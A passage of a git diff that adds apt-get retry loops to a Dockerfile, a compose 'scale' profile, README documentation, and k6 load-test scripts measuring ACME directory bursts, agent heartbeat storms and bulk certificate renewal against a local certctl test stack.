@@ -82,16 +82,30 @@ ARG LIBEST_REF
|
|||||||
# is the same major version libest r3.2.0 was tested against. libest
|
# is the same major version libest r3.2.0 was tested against. libest
|
||||||
# also wants libcurl + libsafec; we install both via apt rather than
|
# also wants libcurl + libsafec; we install both via apt rather than
|
||||||
# building from source for reproducibility.
|
# building from source for reproducibility.
|
||||||
RUN apt-get update && apt-get install --no-install-recommends -y \
|
#
|
||||||
autoconf \
|
# Hotfix #18 (2026-05-14): wrap in a 3-retry loop with --fix-missing
|
||||||
automake \
|
# fallback to absorb transient Debian mirror flakes. The original
|
||||||
build-essential \
|
# unwrapped apt-get install failed CI run #N on a "Connection reset
|
||||||
ca-certificates \
|
# by peer" mid-fetch of libssh2-1 from fastly's debian.org mirror at
|
||||||
git \
|
# 151.101.202.132. Mirrors flake; production-grade Dockerfiles wrap
|
||||||
libcurl4-openssl-dev \
|
# network ops in retry. Same pattern as the main Dockerfile's npm-ci
|
||||||
libssl-dev \
|
# 3-retry loop from Hotfix #9.
|
||||||
libtool \
|
RUN for i in 1 2 3; do \
|
||||||
pkg-config \
|
apt-get update && \
|
||||||
|
apt-get install --no-install-recommends -y --fix-missing \
|
||||||
|
autoconf \
|
||||||
|
automake \
|
||||||
|
build-essential \
|
||||||
|
ca-certificates \
|
||||||
|
git \
|
||||||
|
libcurl4-openssl-dev \
|
||||||
|
libssl-dev \
|
||||||
|
libtool \
|
||||||
|
pkg-config \
|
||||||
|
&& break; \
|
||||||
|
echo "apt-get install attempt $i/3 failed; sleeping 5s before retry"; \
|
||||||
|
sleep 5; \
|
||||||
|
done \
|
||||||
&& rm -rf /var/lib/apt/lists/*
|
&& rm -rf /var/lib/apt/lists/*
|
||||||
|
|
||||||
WORKDIR /src
|
WORKDIR /src
|
||||||
@@ -172,13 +186,22 @@ RUN git clone --depth 1 --branch ${LIBEST_REF} https://github.com/cisco/libest.g
|
|||||||
# Pinned to the same digest as the builder above (Bundle A / H-001).
|
# Pinned to the same digest as the builder above (Bundle A / H-001).
|
||||||
FROM debian:bullseye-slim@sha256:1a4701c321b1d28b1ff5f0230e766791e4b79b1d4c6c7a70064f4b297b1a330f
|
FROM debian:bullseye-slim@sha256:1a4701c321b1d28b1ff5f0230e766791e4b79b1d4c6c7a70064f4b297b1a330f
|
||||||
|
|
||||||
RUN apt-get update && apt-get install --no-install-recommends -y \
|
# Hotfix #18 (2026-05-14): same 3-retry pattern as the builder stage
|
||||||
bash \
|
# above. Runtime image installs are also vulnerable to transient
|
||||||
ca-certificates \
|
# mirror flakes.
|
||||||
curl \
|
RUN for i in 1 2 3; do \
|
||||||
libcurl4 \
|
apt-get update && \
|
||||||
libssl1.1 \
|
apt-get install --no-install-recommends -y --fix-missing \
|
||||||
openssl \
|
bash \
|
||||||
|
ca-certificates \
|
||||||
|
curl \
|
||||||
|
libcurl4 \
|
||||||
|
libssl1.1 \
|
||||||
|
openssl \
|
||||||
|
&& break; \
|
||||||
|
echo "apt-get install attempt $i/3 failed; sleeping 5s before retry"; \
|
||||||
|
sleep 5; \
|
||||||
|
done \
|
||||||
&& rm -rf /var/lib/apt/lists/* \
|
&& rm -rf /var/lib/apt/lists/* \
|
||||||
&& useradd --create-home --uid 1000 estuser
|
&& useradd --create-home --uid 1000 estuser
|
||||||
|
|
||||||
|
|||||||
@@ -352,8 +352,35 @@ the ACME flow scenario. Operators with kind / cert-manager available
|
|||||||
should pair this with `make acme-cert-manager-test` for end-to-end
|
should pair this with `make acme-cert-manager-test` for end-to-end
|
||||||
verification.
|
verification.
|
||||||
|
|
||||||
|
## Scale tier (Phase 8 SCALE-H2, 2026-05-14)
|
||||||
|
|
||||||
|
Phase 8 closure added three new k6 scenarios that exercise the
|
||||||
|
scale-relevant load surfaces the API tier and connector tier left
|
||||||
|
uncovered:
|
||||||
|
|
||||||
|
| Scenario | k6 file | Seed | Make target |
|
||||||
|
|---|---|---|---|
|
||||||
|
| Bulk-renewal under load | `k6/bulk_renewal.js` | `seed/01_bulk_renewal_certs.sql` (10K certs) | `make loadtest-scale-bulk` |
|
||||||
|
| ACME enrollment burst | `k6/acme_burst.js` | (none — unauth surface) | `make loadtest-scale-acme` |
|
||||||
|
| Agent heartbeat storm | `k6/agent_storm.js` | `seed/02_agent_fleet.sql` (5K agents) | `make loadtest-scale-agent` |
|
||||||
|
|
||||||
|
The scale-tier scenarios live behind the `scale` compose profile so
|
||||||
|
the default `make loadtest` (API tier + connector tier, ~7 min)
|
||||||
|
stays fast. Run all three serially with `make loadtest-scale`, or
|
||||||
|
trigger the `loadtest.yml` workflow's `k6-scale` matrix jobs from
|
||||||
|
the Actions tab for canonical-hardware capture.
|
||||||
|
|
||||||
|
Operator-facing baseline table + threshold contracts + documented
|
||||||
|
limitations live in [`docs/operator/scale.md`](../../../docs/operator/scale.md)
|
||||||
|
under the "Scale-tier scenarios (SCALE-H2, Phase 8)" section. Treat
|
||||||
|
that as the canonical source — this README only links.
|
||||||
|
|
||||||
|
The seed fixtures + their idempotency contract are documented in
|
||||||
|
[`seed/README.md`](seed/README.md).
|
||||||
|
|
||||||
## Audit references
|
## Audit references
|
||||||
|
|
||||||
- API tier: 2026-05-01 issuer coverage audit fix #8.
|
- API tier: 2026-05-01 issuer coverage audit fix #8.
|
||||||
- Connector tier: 2026-05-02 deployment-target audit Bundle 10.
|
- Connector tier: 2026-05-02 deployment-target audit Bundle 10.
|
||||||
- ACME flows: Phase 5 master prompt (project notes).
|
- ACME flows: Phase 5 master prompt (project notes).
|
||||||
|
- Scale tier: 2026-05-14 architecture diligence Phase 8 (SCALE-H2).
|
||||||
|
|||||||
@@ -351,3 +351,128 @@ services:
|
|||||||
- run
|
- run
|
||||||
- --summary-export=/results/summary.json
|
- --summary-export=/results/summary.json
|
||||||
- /scripts/k6.js
|
- /scripts/k6.js
|
||||||
|
|
||||||
|
# ===========================================================================
|
||||||
|
# Phase 8 SCALE-H2 — scale-tier scenarios (opt-in via `--profile scale`).
|
||||||
|
#
|
||||||
|
# The default `make loadtest` path runs the API tier + connector tier
|
||||||
|
# scenarios above against the demo-scale seed. The Phase 8 scenarios are
|
||||||
|
# heavier (10K cert + 5K agent fixtures) and would slow the default path
|
||||||
|
# without serving the per-PR signal the existing run targets, so they live
|
||||||
|
# behind a separate compose profile.
|
||||||
|
#
|
||||||
|
# Three components, all profile-gated:
|
||||||
|
# 1. scale-seed — one-shot init that runs ./seed/*.sql against the
|
||||||
|
# same postgres the server uses. Idempotent.
|
||||||
|
# 2. k6-scale-bulk / k6-scale-acme / k6-scale-agent — one driver each
|
||||||
|
# for the three Phase 8 scenarios. The matrix dispatch
|
||||||
|
# in .github/workflows/loadtest.yml picks one per job.
|
||||||
|
#
|
||||||
|
# Run a single scale scenario locally:
|
||||||
|
# docker compose --profile scale up \
|
||||||
|
# --abort-on-container-exit --exit-code-from k6-scale-bulk \
|
||||||
|
# scale-seed k6-scale-bulk
|
||||||
|
# ===========================================================================
|
||||||
|
|
||||||
|
scale-seed:
|
||||||
|
# postgres:16-alpine bundles psql; no extra image needed.
|
||||||
|
image: postgres:16-alpine
|
||||||
|
container_name: certctl-loadtest-scale-seed
|
||||||
|
restart: "no"
|
||||||
|
profiles: ["scale"]
|
||||||
|
depends_on:
|
||||||
|
postgres:
|
||||||
|
condition: service_healthy
|
||||||
|
# Wait for certctl-server to be healthy — the server runs schema
|
||||||
|
# migrations + seed_demo.sql at boot. The Phase 8 seeds reference
|
||||||
|
# FKs (iss-local, o-alice, t-platform, rp-standard) that
|
||||||
|
# seed_demo.sql creates, so the order MUST be:
|
||||||
|
# postgres up → server runs migrations + seed_demo.sql → scale-seed runs
|
||||||
|
certctl-server:
|
||||||
|
condition: service_healthy
|
||||||
|
environment:
|
||||||
|
PGHOST: postgres
|
||||||
|
PGUSER: certctl
|
||||||
|
PGPASSWORD: loadtestpass
|
||||||
|
PGDATABASE: certctl
|
||||||
|
volumes:
|
||||||
|
- ./seed:/seed:ro
|
||||||
|
entrypoint: /bin/sh
|
||||||
|
command:
|
||||||
|
- -c
|
||||||
|
- |
|
||||||
|
set -eu
|
||||||
|
echo "==> Phase 8 scale-seed: running SQL fixtures (lexical order)"
|
||||||
|
for f in /seed/*.sql; do
|
||||||
|
echo "----> $$f"
|
||||||
|
psql -v ON_ERROR_STOP=1 -f "$$f"
|
||||||
|
done
|
||||||
|
echo "==> Phase 8 scale-seed: complete"
|
||||||
|
|
||||||
|
k6-scale-bulk:
|
||||||
|
image: grafana/k6:0.54.0
|
||||||
|
container_name: certctl-loadtest-k6-bulk
|
||||||
|
profiles: ["scale"]
|
||||||
|
depends_on:
|
||||||
|
certctl-server:
|
||||||
|
condition: service_healthy
|
||||||
|
scale-seed:
|
||||||
|
condition: service_completed_successfully
|
||||||
|
environment:
|
||||||
|
CERTCTL_BASE: https://certctl-server:8443
|
||||||
|
CERTCTL_TOKEN: load-test-token
|
||||||
|
K6_INSECURE_SKIP_TLS_VERIFY: "true"
|
||||||
|
volumes:
|
||||||
|
- ./k6/bulk_renewal.js:/scripts/bulk_renewal.js:ro
|
||||||
|
- ./results:/results
|
||||||
|
command:
|
||||||
|
- run
|
||||||
|
- --summary-export=/results/summary-bulk-renewal.json
|
||||||
|
- /scripts/bulk_renewal.js
|
||||||
|
|
||||||
|
k6-scale-acme:
|
||||||
|
image: grafana/k6:0.54.0
|
||||||
|
container_name: certctl-loadtest-k6-acme
|
||||||
|
profiles: ["scale"]
|
||||||
|
depends_on:
|
||||||
|
certctl-server:
|
||||||
|
condition: service_healthy
|
||||||
|
# ACME scenario doesn't depend on the SQL seeds (it hits the
|
||||||
|
# unauthenticated directory + nonce + ARI surface) but routing
|
||||||
|
# it through the same dependency chain keeps the compose
|
||||||
|
# ordering predictable across the three scale jobs.
|
||||||
|
scale-seed:
|
||||||
|
condition: service_completed_successfully
|
||||||
|
environment:
|
||||||
|
CERTCTL_ACME_DIRECTORY: https://certctl-server:8443/acme/profile/prof-test/directory
|
||||||
|
K6_INSECURE_SKIP_TLS_VERIFY: "true"
|
||||||
|
volumes:
|
||||||
|
- ./k6/acme_burst.js:/scripts/acme_burst.js:ro
|
||||||
|
- ./results:/results
|
||||||
|
command:
|
||||||
|
- run
|
||||||
|
- --summary-export=/results/summary-acme-burst.json
|
||||||
|
- /scripts/acme_burst.js
|
||||||
|
|
||||||
|
k6-scale-agent:
|
||||||
|
image: grafana/k6:0.54.0
|
||||||
|
container_name: certctl-loadtest-k6-agent
|
||||||
|
profiles: ["scale"]
|
||||||
|
depends_on:
|
||||||
|
certctl-server:
|
||||||
|
condition: service_healthy
|
||||||
|
scale-seed:
|
||||||
|
condition: service_completed_successfully
|
||||||
|
environment:
|
||||||
|
CERTCTL_BASE: https://certctl-server:8443
|
||||||
|
CERTCTL_TOKEN: load-test-token
|
||||||
|
K6_INSECURE_SKIP_TLS_VERIFY: "true"
|
||||||
|
# Match the seed's 5K-agent fleet.
|
||||||
|
K6_AGENT_FLEET: "5000"
|
||||||
|
volumes:
|
||||||
|
- ./k6/agent_storm.js:/scripts/agent_storm.js:ro
|
||||||
|
- ./results:/results
|
||||||
|
command:
|
||||||
|
- run
|
||||||
|
- --summary-export=/results/summary-agent-storm.json
|
||||||
|
- /scripts/agent_storm.js
|
||||||
|
|||||||
@@ -0,0 +1,183 @@
|
|||||||
|
// Phase 8 SCALE-H2 — ACME enrollment burst.
|
||||||
|
//
|
||||||
|
// What this measures:
|
||||||
|
// 200 concurrent VUs hammering the unauthenticated ACME directory
|
||||||
|
// + new-nonce + ARI surface for 5 minutes. The goal is the
|
||||||
|
// throughput ceiling for the entry-point handlers and the
|
||||||
|
// per-account rate-limit response shape Phase 5 added (RFC 8555
|
||||||
|
// §6.7 + RFC 7807 + the certctl-specific
|
||||||
|
// ErrACMEConcurrentOrdersExceeded path).
|
||||||
|
//
|
||||||
|
// What this does NOT measure (and why):
|
||||||
|
// - JWS-signed POST flows (new-account, new-order, finalize).
|
||||||
|
// k6 doesn't ship JWS, and bundling a Go signing helper into
|
||||||
|
// the k6 container would obscure the server-side latency the
|
||||||
|
// scenario is trying to pin. The existing
|
||||||
|
// `deploy/test/loadtest/k6/acme_flow.js` Phase 5 scenario
|
||||||
|
// made the same explicit trade-off; this Phase 8 burst scenario
|
||||||
|
// reuses the constraint. End-to-end JWS-signed conformance is
|
||||||
|
// gated by `make acme-rfc-conformance-test` (which uses lego
|
||||||
|
// against the same compose stack).
|
||||||
|
// - The actual order/finalize hot path. The newOrder handler's
|
||||||
|
// constant-time SCAN against acme_orders + the per-account
|
||||||
|
// concurrent-orders gate ARE useful to load-test, but require
|
||||||
|
// valid JWS to reach. The directory + new-nonce surface this
|
||||||
|
// scenario hits is what every ACME client transits BEFORE the
|
||||||
|
// signed flow — measuring it pins the server's headroom for
|
||||||
|
// the rest of the flow.
|
||||||
|
// - Issuer-side enrollment latency (DigiCert ACME, Let's Encrypt
|
||||||
|
// against a real prod CA, etc.). Same "load-testing someone
|
||||||
|
// else's API" carve-out as the API tier.
|
||||||
|
//
|
||||||
|
// What this DOES measure:
|
||||||
|
// - GET /acme/profile/{id}/directory throughput. Sustained 200
|
||||||
|
// concurrent VUs at a low per-VU sleep produces ~600-1000 req/s
|
||||||
|
// against this endpoint, well above what any production ACME
|
||||||
|
// client would generate but the right shape for finding the
|
||||||
|
// ceiling.
|
||||||
|
// - HEAD /acme/profile/{id}/new-nonce throughput. Nonce
|
||||||
|
// allocation is a hot path that writes one row to acme_nonces.
|
||||||
|
// - GET /acme/profile/{id}/renewal-info/{cert-id} 4xx fast path.
|
||||||
|
// Synthetic cert-id → handler returns 4xx without a DB lookup
|
||||||
|
// (cert-id is malformed at the parse layer). Measures the
|
||||||
|
// handler-front overhead under load.
|
||||||
|
// - 429 rate-limit response shape. The Phase 5 ACME per-account
|
||||||
|
// rate limit fires at sustained spike rates; the scenario pins
|
||||||
|
// that the 429 body is RFC 7807 with the
|
||||||
|
// "urn:ietf:params:acme:error:rateLimited" type. A regression
|
||||||
|
// that returned a plain text 429 or a different problem type
|
||||||
|
// would break ACME clients hard.
|
||||||
|
//
|
||||||
|
// Threshold contract:
|
||||||
|
// - directory p95 < 500ms, new-nonce p95 < 300ms, renewal-info
|
||||||
|
// p95 < 800ms — same as the Phase 5 acme_flow.js baselines.
|
||||||
|
// - 429 responses are EXPECTED at sustained 200 VU rate (the
|
||||||
|
// server's RFC-compliant rate limiter SHOULD kick in). The
|
||||||
|
// http_req_failed metric is tagged separately so 429s don't
|
||||||
|
// break the threshold; a separate `rate_limited` Counter
|
||||||
|
// tracks them so the operator can see how often the limiter
|
||||||
|
// fires.
|
||||||
|
|
||||||
|
import http from 'k6/http';
|
||||||
|
import { check } from 'k6';
|
||||||
|
import { Counter, Trend } from 'k6/metrics';
|
||||||
|
import { textSummary } from 'https://jslib.k6.io/k6-summary/0.0.2/index.js';
|
||||||
|
|
||||||
|
const ACME_BASE = __ENV.CERTCTL_ACME_DIRECTORY ||
|
||||||
|
'https://certctl-server:8443/acme/profile/prof-test/directory';
|
||||||
|
|
||||||
|
// Custom metrics.
|
||||||
|
const directoryDuration = new Trend('acme_directory_duration', true);
|
||||||
|
const newNonceDuration = new Trend('acme_new_nonce_duration', true);
|
||||||
|
const renewalInfoDuration = new Trend('acme_renewal_info_duration', true);
|
||||||
|
const rateLimitedCount = new Counter('acme_rate_limited_count');
|
||||||
|
const rateLimitShapeOK = new Counter('acme_rate_limit_shape_ok');
|
||||||
|
|
||||||
|
export const options = {
|
||||||
|
scenarios: {
|
||||||
|
acme_burst: {
|
||||||
|
executor: 'constant-vus',
|
||||||
|
vus: parseInt(__ENV.K6_ACME_VUS || '200', 10),
|
||||||
|
duration: __ENV.K6_ACME_DURATION || '5m',
|
||||||
|
gracefulStop: '30s',
|
||||||
|
tags: { scenario: 'acme_burst' },
|
||||||
|
},
|
||||||
|
},
|
||||||
|
thresholds: {
|
||||||
|
'acme_directory_duration': ['p(95)<500'],
|
||||||
|
'acme_new_nonce_duration': ['p(95)<300'],
|
||||||
|
'acme_renewal_info_duration': ['p(95)<800'],
|
||||||
|
// 4xx (rate-limited or malformed-cert-id) is expected; 5xx is
|
||||||
|
// not. Filter to status >= 500 for the failure floor.
|
||||||
|
'http_req_failed{scenario:acme_burst,server_error:true}': ['rate<0.001'],
|
||||||
|
},
|
||||||
|
insecureSkipTLSVerify: true,
|
||||||
|
summaryTrendStats: ['avg', 'min', 'med', 'p(95)', 'p(99)', 'max'],
|
||||||
|
};
|
||||||
|
|
||||||
|
export default function () {
|
||||||
|
// Step 1 — directory.
|
||||||
|
let res = http.get(ACME_BASE, {
|
||||||
|
tags: { scenario: 'acme_burst', step: 'directory' },
|
||||||
|
});
|
||||||
|
directoryDuration.add(res.timings.duration);
|
||||||
|
check(res, { 'directory 200': (r) => r.status === 200 });
|
||||||
|
|
||||||
|
if (res.status === 429) {
|
||||||
|
recordRateLimit(res);
|
||||||
|
return; // backoff this VU iteration
|
||||||
|
}
|
||||||
|
if (res.status !== 200) return;
|
||||||
|
|
||||||
|
const dir = res.json();
|
||||||
|
|
||||||
|
// Step 2 — new-nonce.
|
||||||
|
if (dir.newNonce) {
|
||||||
|
res = http.head(dir.newNonce, {
|
||||||
|
tags: { scenario: 'acme_burst', step: 'new_nonce' },
|
||||||
|
});
|
||||||
|
newNonceDuration.add(res.timings.duration);
|
||||||
|
if (res.status === 429) {
|
||||||
|
recordRateLimit(res);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
check(res, {
|
||||||
|
'new-nonce 200': (r) => r.status === 200,
|
||||||
|
'replay-nonce header present': (r) => !!r.headers['Replay-Nonce'],
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
// Step 3 — ARI synthetic 4xx fast path. Phase 4 added ARI
|
||||||
|
// (RFC 9773); this exercises the malformed-cert-id branch which
|
||||||
|
// returns a 4xx without a DB lookup. Pinning this here means a
|
||||||
|
// regression that turned the malformed path into a DB query
|
||||||
|
// would surface as a p95 spike.
|
||||||
|
if (dir.renewalInfo) {
|
||||||
|
res = http.get(dir.renewalInfo + '/aaaa.bbbb', {
|
||||||
|
tags: { scenario: 'acme_burst', step: 'renewal_info' },
|
||||||
|
});
|
||||||
|
renewalInfoDuration.add(res.timings.duration);
|
||||||
|
if (res.status === 429) {
|
||||||
|
recordRateLimit(res);
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
check(res, {
|
||||||
|
'renewal-info 4xx for synthetic cert-id':
|
||||||
|
(r) => r.status === 400 || r.status === 404,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// recordRateLimit pins the Phase 5 ACME rate-limit response shape:
|
||||||
|
// - HTTP 429
|
||||||
|
// - Content-Type: application/problem+json
|
||||||
|
// - Body: {"type":"urn:ietf:params:acme:error:rateLimited", ...}
|
||||||
|
// A regression that returned 503 or a plain-text 429 or a different
|
||||||
|
// problem type would NOT increment acme_rate_limit_shape_ok and the
|
||||||
|
// operator would see (rate_limited_count - shape_ok_count) > 0 in
|
||||||
|
// the summary.
|
||||||
|
function recordRateLimit(res) {
|
||||||
|
rateLimitedCount.add(1);
|
||||||
|
const ct = res.headers['Content-Type'] || '';
|
||||||
|
if (!ct.includes('application/problem+json')) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
let body;
|
||||||
|
try {
|
||||||
|
body = res.json();
|
||||||
|
} catch (e) {
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
if (body && typeof body.type === 'string' &&
|
||||||
|
body.type.startsWith('urn:ietf:params:acme:error:rateLimited')) {
|
||||||
|
rateLimitShapeOK.add(1);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
export function handleSummary(data) {
|
||||||
|
return {
|
||||||
|
'/results/summary-acme-burst.json': JSON.stringify(data, null, 2),
|
||||||
|
'/results/summary-acme-burst.txt': textSummary(data, { indent: ' ', enableColors: false }),
|
||||||
|
stdout: textSummary(data, { indent: ' ', enableColors: true }),
|
||||||
|
};
|
||||||
|
}
|
||||||
@@ -0,0 +1,126 @@
|
|||||||
|
// Phase 8 SCALE-H2 — agent fleet heartbeat storm.
|
||||||
|
//
|
||||||
|
// What this measures:
|
||||||
|
// 5,000 agents heartbeating at 30s intervals = ~167 heartbeats/sec
|
||||||
|
// sustained. Each heartbeat is POST /api/v1/agents/{id}/heartbeat
|
||||||
|
// with optional metadata. Pre-seeded fleet provided by
|
||||||
|
// deploy/test/loadtest/seed/02_agent_fleet.sql.
|
||||||
|
//
|
||||||
|
// What this does NOT measure:
|
||||||
|
// - The agent work-poll path (GET /api/v1/agents/{id}/work). The
|
||||||
|
// heartbeat hot path is the highest-frequency call on a typical
|
||||||
|
// fleet (work-poll cadence is 30s default like heartbeat, but
|
||||||
|
// work-poll returns the empty set 99% of the time and is cheap;
|
||||||
|
// heartbeat does an UPDATE on every call). v2 of the harness
|
||||||
|
// could combine them.
|
||||||
|
// - The agent CSR-submit path (POST /api/v1/agents/{id}/csr). That
|
||||||
|
// fires on per-cert issuance, not per heartbeat, and is exercised
|
||||||
|
// by the existing API tier's POST /api/v1/certificates scenario.
|
||||||
|
// - Auth-key per-agent rotation. The loadtest stack runs with a
|
||||||
|
// single api-key (`load-test-token`); per-agent api-key
|
||||||
|
// hashing/rotation isn't a load axis.
|
||||||
|
//
|
||||||
|
// Why constant-arrival-rate (not constant-vus):
|
||||||
|
// The point is to model what 5K real agents would offer the server
|
||||||
|
// at their native cadence. 5K agents * (1 heartbeat / 30s) =
|
||||||
|
// 166.67 req/s offered. constant-arrival-rate fires at exactly
|
||||||
|
// that rate regardless of latency; if the server backpressures,
|
||||||
|
// queue builds and p99 shows it. constant-vus would let slow
|
||||||
|
// responses block, masking the actual ceiling.
|
||||||
|
//
|
||||||
|
// Threshold contract:
|
||||||
|
// - p99 < 1s for the heartbeat POST. The handler does an UPDATE on
|
||||||
|
// agents.last_heartbeat_at (+ optional metadata columns) and an
|
||||||
|
// RBAC check. Even at 200 req/s a tight UPDATE on an indexed
|
||||||
|
// primary key should stay sub-second.
|
||||||
|
// - p95 < 500ms.
|
||||||
|
// - Error rate < 0.1%. The seeded agents are all status='Online'
|
||||||
|
// so no 410 Gone (retired-agent) responses; anything 4xx is a
|
||||||
|
// bug. 5xx is a server health regression.
|
||||||
|
//
|
||||||
|
// Phase 8 reference:
|
||||||
|
// - Source finding: SCALE-H2.
|
||||||
|
// - Pre-state: heartbeat path not load-tested. The 100-agent demo
|
||||||
|
// seed in seed_demo.sql produces ~3 heartbeats/sec, orders of
|
||||||
|
// magnitude below fleet scale.
|
||||||
|
|
||||||
|
import http from 'k6/http';
|
||||||
|
import { check } from 'k6';
|
||||||
|
import { textSummary } from 'https://jslib.k6.io/k6-summary/0.0.2/index.js';
|
||||||
|
|
||||||
|
const BASE = __ENV.CERTCTL_BASE || 'https://certctl-server:8443';
|
||||||
|
const TOKEN = __ENV.CERTCTL_TOKEN || 'load-test-token';
|
||||||
|
|
||||||
|
// 5000 agents * (1 / 30s) = 166.67 heartbeats/sec. Round to 167.
|
||||||
|
const TARGET_RATE = parseInt(__ENV.K6_AGENT_RATE || '167', 10);
|
||||||
|
|
||||||
|
// Total agents in the fleet seed. The k6 scenario picks an agent at
|
||||||
|
// random per iteration (deterministic via __ITER) to spread the
|
||||||
|
// per-row UPDATE pressure across the table.
|
||||||
|
const FLEET_SIZE = parseInt(__ENV.K6_AGENT_FLEET || '5000', 10);
|
||||||
|
|
||||||
|
export const options = {
|
||||||
|
scenarios: {
|
||||||
|
agent_storm: {
|
||||||
|
executor: 'constant-arrival-rate',
|
||||||
|
rate: TARGET_RATE,
|
||||||
|
timeUnit: '1s',
|
||||||
|
duration: '5m',
|
||||||
|
preAllocatedVUs: 50,
|
||||||
|
maxVUs: 200,
|
||||||
|
exec: 'heartbeat',
|
||||||
|
tags: { scenario: 'agent_storm' },
|
||||||
|
},
|
||||||
|
},
|
||||||
|
thresholds: {
|
||||||
|
'http_req_duration{scenario:agent_storm}': ['p(99)<1000', 'p(95)<500'],
|
||||||
|
'http_req_failed{scenario:agent_storm}': ['rate<0.001'],
|
||||||
|
},
|
||||||
|
summaryTrendStats: ['avg', 'min', 'med', 'p(95)', 'p(99)', 'max'],
|
||||||
|
insecureSkipTLSVerify: true,
|
||||||
|
};
|
||||||
|
|
||||||
|
// agentID returns a deterministic agent id from the loadtest fleet
|
||||||
|
// seed. Spreading round-robin across the fleet means the UPDATE
|
||||||
|
// pressure hits every row equally rather than the same hot row over
|
||||||
|
// and over.
|
||||||
|
function agentID() {
|
||||||
|
// __ITER is k6's per-VU iteration counter; combined with __VU
|
||||||
|
// (the VU index) we get a unique-per-call number that spans
|
||||||
|
// 0..FLEET_SIZE on the modulo.
|
||||||
|
const idx = (__VU * 1000 + __ITER) % FLEET_SIZE;
|
||||||
|
return 'ag-loadtest-' + String(idx + 1).padStart(5, '0');
|
||||||
|
}
|
||||||
|
|
||||||
|
export function heartbeat() {
|
||||||
|
const id = agentID();
|
||||||
|
// Optional metadata; the heartbeat handler tolerates an empty body
|
||||||
|
// (no metadata) but real agents send their version + hostname on
|
||||||
|
// every call so we include them here.
|
||||||
|
const payload = JSON.stringify({
|
||||||
|
version: '2.1.0',
|
||||||
|
hostname: 'loadtest-' + id.slice(-5) + '.fleet.example.test',
|
||||||
|
os: 'linux',
|
||||||
|
architecture: 'amd64',
|
||||||
|
});
|
||||||
|
|
||||||
|
const res = http.post(`${BASE}/api/v1/agents/${id}/heartbeat`, payload, {
|
||||||
|
headers: {
|
||||||
|
'Content-Type': 'application/json',
|
||||||
|
'Authorization': `Bearer ${TOKEN}`,
|
||||||
|
},
|
||||||
|
tags: { scenario: 'agent_storm' },
|
||||||
|
});
|
||||||
|
|
||||||
|
check(res, {
|
||||||
|
'heartbeat 2xx': (r) => r.status >= 200 && r.status < 300,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
export function handleSummary(data) {
|
||||||
|
return {
|
||||||
|
'/results/summary-agent-storm.json': JSON.stringify(data, null, 2),
|
||||||
|
'/results/summary-agent-storm.txt': textSummary(data, { indent: ' ', enableColors: false }),
|
||||||
|
stdout: textSummary(data, { indent: ' ', enableColors: true }),
|
||||||
|
};
|
||||||
|
}
|
||||||
@@ -0,0 +1,129 @@
|
|||||||
|
// Phase 8 SCALE-H2 — bulk-renewal under load.
|
||||||
|
//
|
||||||
|
// What this measures:
|
||||||
|
// POST /api/v1/certificates/bulk-renew throughput against a
|
||||||
|
// 10K-cert pre-seeded fleet. Each iteration POSTs a criteria-mode
|
||||||
|
// bulk-renew request scoped to a subset of the seeded fleet (by
|
||||||
|
// tag) so the server enqueues N renewal jobs and returns a
|
||||||
|
// per-cert {certificate_id, job_id} envelope.
|
||||||
|
//
|
||||||
|
// Why criteria-mode (not certificate-ids mode):
|
||||||
|
// The seeded fleet has a stable `tags.batch = 'bulk-renewal'`
|
||||||
|
// marker. Criteria-mode lets the scenario re-fire without
|
||||||
|
// maintaining a moving list of cert IDs and still scopes the
|
||||||
|
// action to the Phase 8 fixture (no risk of touching a real
|
||||||
|
// tenant's certs if someone runs the scenario against a non-
|
||||||
|
// loadtest server by mistake — the criteria simply matches
|
||||||
|
// nothing).
|
||||||
|
//
|
||||||
|
// What this does NOT measure:
|
||||||
|
// - The scheduler's renewal scan itself. The bulk-renew handler
|
||||||
|
// enqueues issuance jobs synchronously into the `jobs` table;
|
||||||
|
// the scheduler's `jobProcessorLoop` picks them up on its next
|
||||||
|
// tick. The DB write throughput is what's measured here; the
|
||||||
|
// job-execution path is bounded by per-issuer concurrency
|
||||||
|
// (CERTCTL_RENEWAL_CONCURRENCY=25 default) and isn't usefully
|
||||||
|
// amplified by adding more inbound bulk-renew calls.
|
||||||
|
// - Full POST → poll deployments → cert-served loop. Same v1/v2
|
||||||
|
// deferral as the connector-tier scenarios — needs the agent
|
||||||
|
// poll surface plumbed end-to-end.
|
||||||
|
//
|
||||||
|
// Threshold contract:
|
||||||
|
// - p99 < 5s, p95 < 2s for the bulk-renew POST. Each call walks
|
||||||
|
// the criteria, materializes the matching managed_certificates
|
||||||
|
// rows, inserts N rows into `jobs`, and returns the envelope.
|
||||||
|
// - Error rate < 1%. Anything 4xx/5xx counts.
|
||||||
|
//
|
||||||
|
// Phase 8 reference:
|
||||||
|
// - Source finding: SCALE-H2.
|
||||||
|
// - Pre-state: only the API tier (50 req/s POST /certificates +
|
||||||
|
// GET /certificates) and connector tier (per-target handshake)
|
||||||
|
// were measured. The bulk-renew hot path was uncovered.
|
||||||
|
// - Seed: deploy/test/loadtest/seed/01_bulk_renewal_certs.sql
|
||||||
|
// creates 10K rows with tags.batch='bulk-renewal'. The seed
|
||||||
|
// must run before this scenario; the scale-seed compose
|
||||||
|
// profile gates this.
|
||||||
|
|
||||||
|
import http from 'k6/http';
|
||||||
|
import { check } from 'k6';
|
||||||
|
import { textSummary } from 'https://jslib.k6.io/k6-summary/0.0.2/index.js';
|
||||||
|
|
||||||
|
const BASE = __ENV.CERTCTL_BASE || 'https://localhost:8443';
|
||||||
|
const TOKEN = __ENV.CERTCTL_TOKEN || 'load-test-token';
|
||||||
|
|
||||||
|
// Sustained throughput target. constant-arrival-rate at 5 req/s for 5
|
||||||
|
// minutes = 1500 bulk-renew POSTs. Each POST touches up to 10K
|
||||||
|
// managed_certificates rows (criteria scan) + inserts up to 10K
|
||||||
|
// rows into `jobs`, so the offered load is higher than the API
|
||||||
|
// tier's 50 req/s on raw queries-per-second but the per-call
|
||||||
|
// cost is larger.
|
||||||
|
//
|
||||||
|
// 5 req/s was picked deliberately:
|
||||||
|
// - 50 req/s combined with the API tier's 50 saturates the demo-
|
||||||
|
